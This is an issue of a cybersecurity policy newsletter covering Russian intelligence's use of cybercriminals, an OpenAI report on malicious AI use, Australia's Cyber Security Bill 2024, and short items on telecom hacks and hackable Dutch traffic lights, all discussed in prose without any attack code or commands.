Russia's GRU Thugs Double Down on Recruiting Cybercrooks

Your weekly dose of Seriously Risky Business news is written by Tom Uren and edited by Patrick Gray. It's supported by Lawfare with help from the William and Flora Hewlett Foundation. This week's edition is sponsored by Trail of Bits.

You can hear a podcast discussion of this newsletter by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed.

Several strands of evidence suggest Russia's use of cybercriminals to support its war effort in Ukraine is now planned and deliberate rather than ad hoc and opportunistic. 

Russia's strategy to harness cybercriminal resources has evolved over the duration of the war. Prior to the conflict, connections between the Russian state and cybercriminals appeared to be opportunistic and based on relationships and connections between individuals.

However, a Mandiant report from April this year suggested that Sandworm (aka Unit 74455 of the GRU), was acquiring tools and bulletproof hosting services from criminal marketplaces. Now Russian intelligence services are taking the next logical step and are directly acquiring people from the criminal talent pool.  

In its 2024 Digital Defense Report, released this week, Microsoft writes:

…Russian threat actors have integrated evermore commodity malware in their operations and appear to have outsourced some cyberespionage operations to criminal groups.

In June 2024, Storm-2049 (UAC-0184) used Xworm and Remcos RAT — commodity malware associated with criminal activity — to compromise at least 50 Ukrainian military devices. There was no obvious cybercriminal use for this compromise, suggesting the group was operating in support of Russian government objectives.

Between June-July 2023, Microsoft observed Federal Security Service (FSB)-attributed Aqua Blizzard appear to "hand-off" access to 34 compromised Ukrainian devices to the cybercriminal group Storm-0593 (also known as Invisimole). The hand-off occurred when Aqua Blizzard invoked a Powershell script that downloaded software from a Storm0593-controlled server. Storm-0593 then established command and control infrastructure and deployed Cobalt Strike beacons on most of the devices for follow-on activity. This beacon was configured with the domain dashcloudew.uk, which Microsoft assesses Storm-0593 registered and used in a previous spear-phishing campaign against Ukrainian military machines last year, suggesting a pattern by Storm-0593 of supporting state intelligence collection objectives.

In early September, the US government issued an advisory warning that, since 2020, Unit 29155, a Russian military intelligence (GRU) sabotage and assassination unit, had "expanded their tradecraft to include offensive cyber operations".

Partly, this appears to be on-the-job training, partly recruiting cyber criminals. Per the advisory: 

FBI assesses the Unit 29155 cyber actors to be junior active-duty GRU officers under the direction of experienced Unit 29155 leadership. These individuals appear to be gaining cyber experience and enhancing their technical skills through conducting cyber operations and intrusions. Additionally, FBI assesses Unit 29155 cyber actors rely on non-GRU actors, including known cyber-criminals and enablers to conduct their operations.

GRU thugs do not strike us as natural keyboard maestros, but probably are well suited for coercing weedy cybercrooks into hacking for the state.

Ukraine's cyber security organisation, the SSSCIP, has also reported on a group directed by  personnel from law enforcement agencies in occupied Luhansk. There is no firm evidence here, but again we wonder if law enforcement officers from regional Ukraine have hands-on-keyboard skills, or simply leverage over local cybercriminals. 

Taken together, all these strands of evidence suggest a much more deliberate and structured recruitment of criminals into Russia's war effort. Recruiting or training skilled cyber security talent into intelligence agencies takes time, whereas telling crims to do some patriotic hacking or else… is quick. 

AI Is No Gift to Malicious Actors 

Malicious cyber actors are experimenting with AI, but have not found a way to use the technology to scale and accelerate their activities, according to prominent AI organisation OpenAI. 

Last week OpenAI released an Influence and Cyber Operations update report that analysed the activities of malicious actors using its tools, and included a range of case studies. The report provides insights into how some actors are experimenting with AI.

The case studies describe how actors try to use ChatGPT to assist with reconnaissance, vulnerability research, scripting or software development, or social engineering. 

In all these case studies OpenAI's conclusion is that "use of our models did not appear to provide them with novel capabilities or directions that they could not otherwise have obtained from multiple publicly available resources". 

Happily, OpenAI found that ChatGPT was very useful for its security work:

Throughout this investigation, our security teams leveraged ChatGPT to analyse, categorise, translate, and summarise interactions from adversary accounts. This enabled us to rapidly derive insights from large datasets while minimising the resources required for this work. As our models become more advanced, we expect we will also be able to use ChatGPT to reverse engineer and analyse the malicious attachments sent to employees.

OpenAI describes half a dozen covert influence operations targeting elections around the world. These operations used AI for content creation and the management of fake personas on social media sites. 

OpenAI found that these operations all had limited impact with "the majority of social media posts that we identified as being generated from our models received few or no likes, shares, or comments". 

Ironically, the ChatGPT-related operation that did go viral was a hoax on X that purported to be the output of a Russian troll account whose credits for using OpenAI's GPT-4o model had expired.  

OpenAI said that this response appeared to be manually generated as it was not valid JSON and incorrectly referenced the model's name. Even though this post was a hoax, the same X account had been using OpenAI models to be argumentative "apparently in an attempt to bait controversy". 

So far at least, it appears the apparent malicious use of AI is more interesting than the actual malicious use of AI.  

Despite the absence of significant impact so far, we think these kinds of reports into the adversarial or malicious use of AI technologies should be applauded and encouraged in other companies. 

Australia's Actually Quite Sensible Cybersecurity Bill

New Australian cyber security legislation will introduce world-first reporting obligations for companies regarding ransomware incidents and payments. 

Beyond mandatory ransomware reporting, the Cyber Security Bill 2024 imposes security standards on smart devices and establishes an Australian Cyber Incident Review Board. These initiatives all make sense. What is surprising is that it has taken until 2024 to reach this stage. 

Cyber security authorities regularly bemoan the absence of authoritative data on incidents. Ransomware, and payments in particular, are notoriously underreported, and it is difficult to know if anti-ransomware initiatives are working when it is not possible to assess the state of play.

The reporting obligation applies to companies that meet a minimum revenue threshold and the information in these reports can only be used for cyber security purposes. It can't be forwarded to government regulators and used to fine companies, for example. 

At the same time, reporting incidents to cyber security authorities isn't a 'get out of jail free' card. If companies have been behaving improperly they can still be subject to regulatory action (although regulators need to build a case using information derived from other sources). 

The bill also establishes the Cyber Incident Review Board (CIRB), Australia's version of the US Cyber Safety Review Board. We are big fans of the US' CSRB which has produced a number of impactful reports. These can sting companies into taking action — the most notable case being the report that lashed Microsoft for its 'cascade of security failures'. 

However, the US is the home to several of the world's most influential technology companies and is central to the internet whereas Australia… is not. The CIRB aims to learn from the circumstances that lead up to incidents through to industry and government responses. There have been several high-impact breaches in recent years where this kind of comprehensive review would have been tremendously valuable. 

The Australian review board goes a step further than the US' CSRB with the ability to compel information from entities involved in an incident under review. To balance that power, the board is not to apportion blame and the legislation says that its final report cannot "provide the means to determine the liability of any entity in relation to a cyber security incident". 

Finally, the Cyber Security Bill will strengthen security standards for smart internet-connected devices. Rather than defining standards in legislation, the minister sets standards by issuing rules, which can be changed over time. This is not uncommon in Australian legislation, and social media safety standards are set by ministerial decree in the Basic Online Safety Expectations. The intent here is to adjust standards upward over time to the extent that the market will bear.

These are all good moves, but it is amazing they took so long. 

Watch Patrick Gray and Tom Uren discuss this edition of the newsletter:

Three Reasons to Be Cheerful This Week:

1. UK doing more to protect schools from ransomware: The UK's NCSC has announced that it is rolling out its Protective Domain Name System (PDNS) to schools nationally. The PDNS protects organisations by preventing them from connecting to known malicious domains and is already used across the UK Government including the Ministry of Defence. 
2. Hardened hardware for the Trump campaign: Key members of the Trump campaign are reportedly using hardened devices including phones preinstalled with a stripped-down version of the Android operating system. It is good news that the campaign is investing in security, but we wonder how useful the devices will actually be — they are so locked down they only communicate within closed networks of like devices. 
3. Smarter theft detection on Android: Google has published an interesting post on tightening Android to make it harder for thieves to get anything useful out of stolen phones. Some of these techniques are fairly simple, such as locking a phone if it is taken offline for a prolonged period (for data extraction or to avoid a remote wipe, for example) and making it easier to remotely lock or wipe a device from a trusted phone number. The interesting part of the post describes using machine learning to analyse multiple on-device signals to detect theft attempts and lock the device in response. You know if your phone is stolen, so given the array of sensors it has, why shouldn't your phone?

Sponsor Section

You might be hearing a lot about post-quantum (PQ) cryptography lately, and it's easy to wonder why it's such a big deal when nobody has actually seen a quantum computer. But even if a quantum computer is never built, new PQ standards are safer, more resilient, and more flexible than their classical counterparts. More from Trail of Bits here.

Quantum is unimportant to post-quantum

By Opal Wright You might be hearing a lot about post-quantum (PQ) cryptography lately, and it’s easy to wonder why it’s such a big deal when nobody has actually seen a quantum computer.…

Trail of Bits BlogTrail of Bits

In this Risky Business News sponsored interview, Tom Uren talks to Dan Guido, CEO of Trail of Bits, about post-quantum cryptography. The pair dive into what it is, why it is needed now and how organisations are dealing with its adoption.

Shorts

Circling The Wagons Against Chinese Telco Hack

The Washington Post reports the Biden administration has formed a multi-agency 'unified coordination group' to manage the government's response to the hack of multiple US telecommunications companies. 

The hack is now believed to affect 10 or 12 companies, up from three known victims last week. The report also states that responders are finding it difficult to evict the intruders because they don't know how they got in in the first place.

It sounds like this is going to take a long time to unwind.   

The FBI Gets Into Cryptocurrency

The Verge reports the FBI created an Ethereum-based cryptocurrency, NexFundAI, to investigate manipulation of cryptocurrency markets. Last week 18 individuals were charged with "widespread fraud and manipulation in the cryptocurrency markets" after they tried to manipulate the currency's price. 

Just like An0m, but for crypto! 

Risky Biz Talks

You can find the audio edition of this newsletter and other fine podcasts and interviews in the Risky Biz News feed (RSS, iTunes or Spotify).  

In our last "Between Two Nerds" discussion Tom Uren and The Grugq talk about how criminals are using deepfakes… but it is not the end of the world.

From Risky Biz News:

China says the US is framing other countries for espionage operations: The Chinese government has put out another report of questionable quality this week, claiming that the US is trying to smear poor lil' China as a bad cyber actor.

Beijing officials say that the US is actually the country behind most cyber espionage operations today, and they possess a "cyber weapon" that can mislead investigators and frame other states for its intrusions.

The report [English PDF] is the third in a series of reports that China's National Computer Virus Emergency Response Center (CVERC) has published on the topic this year, after previous reports in April and July.

The reports typically come out after the US government and US media expose new Chinese cyber-espionage operations in the US. This one came out days after US officials claimed that Chinese hackers breached sensitive systems at US telcos used for law enforcement wiretaps—basically, China wiretapped the US wiretapping system.

[more on Risky Business News including an examination of the differences between the US and Chinese approaches to outing operations]

Pro-Kremlin disinfo cluster disrupted ahead of Moldova's election: Meta has taken down a network of fake accounts engaged in a disinformation campaign targeting Moldova a week before the small Eastern European country is set to hold presidential elections and a referendum to join the EU.

The network used fake accounts to manage pages that posed as "independent" news entities.

They posted content primarily in Russian that criticised the country's current president Maia Sandu, Moldova's pro-EU politicians, and the country's ever-increasing closer ties to neighbouring Romania.

[more on Risky Business News]

Dutch government to physically replace tens of thousands of hackable traffic lights: Dutch authorities will have to replace tens of thousands of insecure road traffic lights over the next six years by 2030.

Officials are taking this extreme and very expensive step after a security researcher found a vulnerability that could allow threat actors to change traffic lights on demand.

The issue was discovered earlier this year by Alwin Peppels, a security engineer for Dutch security firm Cyber Seals.

Peppels says threat actors can use a software-defined radio to send commands to the control boxes that sit next to traffic lights.

[more on Risky Business News]